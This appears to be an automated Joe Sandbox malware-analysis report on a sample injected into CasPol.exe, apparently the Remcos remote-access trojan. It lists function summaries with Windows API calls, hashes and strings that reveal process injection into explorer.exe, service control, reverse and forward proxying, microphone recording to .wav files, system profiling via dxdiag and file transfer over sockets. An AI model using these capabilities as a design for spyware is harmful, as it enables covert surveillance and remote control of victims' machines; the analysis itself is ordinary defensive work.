                                                                                                                    • Instruction Fuzzy Hash: 3C318B319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                                    • GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentProcess
                                                                                                                    • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                                    • API String ID: 2050909247-4145329354
                                                                                                                    • Opcode ID: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                                                                                                                    • Instruction ID: 85e9bb49d37c82d50cc0a876bfe2e9cbcca00efa80d213bdcfc81b1d75d5651e
                                                                                                                    • Opcode Fuzzy Hash: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                                                                                                                    • Instruction Fuzzy Hash: FF31CA75240300AFC310AB6DEC49F6A7768EB44705F11443EF50AA76E1EB7998508B6D
                                                                                                                    APIs
                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
                                                                                                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 221034970-0
                                                                                                                    • Opcode ID: 8e03560cb0675c648ac56349715ca1a1b796bf89e929aa235aab360fad5c5935
                                                                                                                    • Instruction ID: 64b7f8b9d702139b787b45b2ac21df1fde646642379ff803e7b0347eb9faadae
                                                                                                                    • Opcode Fuzzy Hash: 8e03560cb0675c648ac56349715ca1a1b796bf89e929aa235aab360fad5c5935
                                                                                                                    • Instruction Fuzzy Hash: 8711C631901218AFD7116B64EC85DFF3BECDB46BA1B000036F942921D1DB64CD46AAF5
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00446DEF
                                                                                                                      • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                    • _free.LIBCMT ref: 00446DFB
                                                                                                                    • _free.LIBCMT ref: 00446E06
                                                                                                                    • _free.LIBCMT ref: 00446E11
                                                                                                                    • _free.LIBCMT ref: 00446E1C
                                                                                                                    • _free.LIBCMT ref: 00446E27
                                                                                                                    • _free.LIBCMT ref: 00446E32
                                                                                                                    • _free.LIBCMT ref: 00446E3D
                                                                                                                    • _free.LIBCMT ref: 00446E48
                                                                                                                    • _free.LIBCMT ref: 00446E56
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                    • Instruction ID: 4059f081e6094245f9dcb18e84e070fbb06f55adf0c09f86c969ccb3ae0415ae
                                                                                                                    • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                    • Instruction Fuzzy Hash: 0E11CB7550051CBFDB05EF55C842CDD3B76EF06364B42C0AAF9086F222DA75DE509B85
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 100059EA
                                                                                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                    • _free.LIBCMT ref: 100059F6
                                                                                                                    • _free.LIBCMT ref: 10005A01
                                                                                                                    • _free.LIBCMT ref: 10005A0C
                                                                                                                    • _free.LIBCMT ref: 10005A17
                                                                                                                    • _free.LIBCMT ref: 10005A22
                                                                                                                    • _free.LIBCMT ref: 10005A2D
                                                                                                                    • _free.LIBCMT ref: 10005A38
                                                                                                                    • _free.LIBCMT ref: 10005A43
                                                                                                                    • _free.LIBCMT ref: 10005A51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                    • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                    • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                    • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Eventinet_ntoa
                                                                                                                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                                    • API String ID: 3578746661-4192532303
                                                                                                                    • Opcode ID: dce6e6b055dd14d2158c78063b175744d8f9912cca24f3b66511937ea36bc463
                                                                                                                    • Instruction ID: 5385bfc655a789aeb426c9546597e5e9554731b695d1c34d5ebe0a8eef4996cc
                                                                                                                    • Opcode Fuzzy Hash: dce6e6b055dd14d2158c78063b175744d8f9912cca24f3b66511937ea36bc463
                                                                                                                    • Instruction Fuzzy Hash: AA517371A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CADC5CB9E
                                                                                                                    APIs
                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DBF), ref: 0045516C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: DecodePointer
                                                                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                    • API String ID: 3527080286-3064271455
                                                                                                                    • Opcode ID: efaf98d5bece97301cb0be0d87691fc7541a968c6dbfa9ece40fee8aaf611780
                                                                                                                    • Instruction ID: dc575b74d0f085a316b11c585a5ec2812edae3f3668b4c4373b6e849a421fba0
                                                                                                                    • Opcode Fuzzy Hash: efaf98d5bece97301cb0be0d87691fc7541a968c6dbfa9ece40fee8aaf611780
                                                                                                                    • Instruction Fuzzy Hash: F7517D70900A09CBCF149FA9E9581BDBBB0FB09342F244197EC45A7366DB7D8A188B1D
                                                                                                                    APIs
                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                                      • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                    • API String ID: 1462127192-2001430897
                                                                                                                    • Opcode ID: 89439ef8661f45509590dfd36efddff029347bf871da0d2e15e3f7cf58161c4e
                                                                                                                    • Instruction ID: c19d1c6df4eaf99de932d1d3e2b79d277c3c3ae54bcdefde962c91a872100eda
                                                                                                                    • Opcode Fuzzy Hash: 89439ef8661f45509590dfd36efddff029347bf871da0d2e15e3f7cf58161c4e
                                                                                                                    • Instruction Fuzzy Hash: 5B313E719001085ADB14FBA1DC96EEE7764AF50708F00017FF906730E2EF786A8ACA9D
                                                                                                                    APIs
                                                                                                                    • _strftime.LIBCMT ref: 00401AD3
                                                                                                                      • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                    • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                                    • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                                    • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                    • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                                    • API String ID: 3809562944-3643129801
                                                                                                                    • Opcode ID: c8c739ad250e8efed681293383896e24ae5503b811cc9679b8fabc89057276be
                                                                                                                    • Instruction ID: 71dc54c49c3278552d12686eedaa48b86947864de512bb92fe626abde6f710f1
                                                                                                                    • Opcode Fuzzy Hash: c8c739ad250e8efed681293383896e24ae5503b811cc9679b8fabc89057276be
                                                                                                                    • Instruction Fuzzy Hash: 98317E315053009BC314EF25DC56A9E77E8BB94314F40883EF559A21F1EF78AA49CB9A
                                                                                                                    APIs
                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                                    • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                                    • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                                    • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                                    • waveInStart.WINMM ref: 00401A81
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                    • String ID: XCG$`=G$x=G
                                                                                                                    • API String ID: 1356121797-903574159
                                                                                                                    • Opcode ID: 8206edf6e37a5adcca5346354a1971bb532ceb570a07efb292636a8a68d9c199
                                                                                                                    • Instruction ID: eaefd7a1fab34284b98bc4f49641b1dd71ce781583fbb4b877c049bb372049a4
                                                                                                                    • Opcode Fuzzy Hash: 8206edf6e37a5adcca5346354a1971bb532ceb570a07efb292636a8a68d9c199
                                                                                                                    • Instruction Fuzzy Hash: 1A215C316012409BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998
                                                                                                                      • Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                                      • Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                                      • Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
                                                                                                                    • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
                                                                                                                    • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
                                                                                                                    • TranslateMessage.USER32(?), ref: 0041CA0B
                                                                                                                    • DispatchMessageA.USER32(?), ref: 0041CA15
                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                    • String ID: Remcos
                                                                                                                    • API String ID: 1970332568-165870891
                                                                                                                    • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                    • Instruction ID: a3c1d7bf95fc3ae1ab8e5dc1b7104b29b221ef3087a45b83961503d05de66f2d
                                                                                                                    • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                    • Instruction Fuzzy Hash: 620121B1944348ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
                                                                                                                    • Instruction ID: eb32e44420a9d0dd2d5c4453ebfd120c933f738a1b2f21936dd04ad6d98d905f
                                                                                                                    • Opcode Fuzzy Hash: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
                                                                                                                    • Instruction Fuzzy Hash: 6FC1E670D042499FEF11DFADD8417AEBBB4EF4A304F08405AE814A7392C778D941CBA9
                                                                                                                    APIs
                                                                                                                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E13,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BE6
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C69
                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00452CA1
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E13,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CFC
                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00452D4B
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D13
                                                                                                                      • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D8F
                                                                                                                    • __freea.LIBCMT ref: 00452DBA
                                                                                                                    • __freea.LIBCMT ref: 00452DC6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 201697637-0
                                                                                                                    • Opcode ID: b1c83994ecbe3f941fd24685bb9664c395dd4006a3bd2ce5fbc620e0f8a5dfb4
                                                                                                                    • Instruction ID: 924e7ddfc51c8ace49a4e982202af340d06b3b5a9b96f94d8290dca04e209d32
                                                                                                                    • Opcode Fuzzy Hash: b1c83994ecbe3f941fd24685bb9664c395dd4006a3bd2ce5fbc620e0f8a5dfb4
                                                                                                                    • Instruction Fuzzy Hash: E691C572E002169BDF218E64CA41AEF7BB5AF0A311F14456BEC01E7243D7ADDC49C7A8
                                                                                                                    APIs
                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1454806937-0
                                                                                                                    • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                    • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                    • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                    • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 004446B3
                                                                                                                    • _free.LIBCMT ref: 00444724
                                                                                                                    • _free.LIBCMT ref: 0044473D
                                                                                                                    • _free.LIBCMT ref: 0044476F
                                                                                                                    • _free.LIBCMT ref: 00444778
                                                                                                                    • _free.LIBCMT ref: 00444784
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                    • String ID: C
                                                                                                                    • API String ID: 1679612858-1037565863
                                                                                                                    • Opcode ID: c80eba29621552cc0015daa61550ea74c149dc0acfa072f5cc390db0d0044802
                                                                                                                    • Instruction ID: 096df170494440478aae843429242aea5750b14c08813bebb9acd843c79e49b1
                                                                                                                    • Opcode Fuzzy Hash: c80eba29621552cc0015daa61550ea74c149dc0acfa072f5cc390db0d0044802
                                                                                                                    • Instruction Fuzzy Hash: E8B14A75A012199FEB24DF18C884BAEB7B4FF49314F1085AEE909A7351D739AE90CF44
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: tcp$udp
                                                                                                                    • API String ID: 0-3725065008
                                                                                                                    • Opcode ID: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                                                                                    • Instruction ID: e5bb8fef491b59a621f975c33c92e719a9e773eef76f1c958f584ffae729cd60
                                                                                                                    • Opcode Fuzzy Hash: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                                                                                    • Instruction Fuzzy Hash: 9171AB716083028FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                                      • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                                      • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
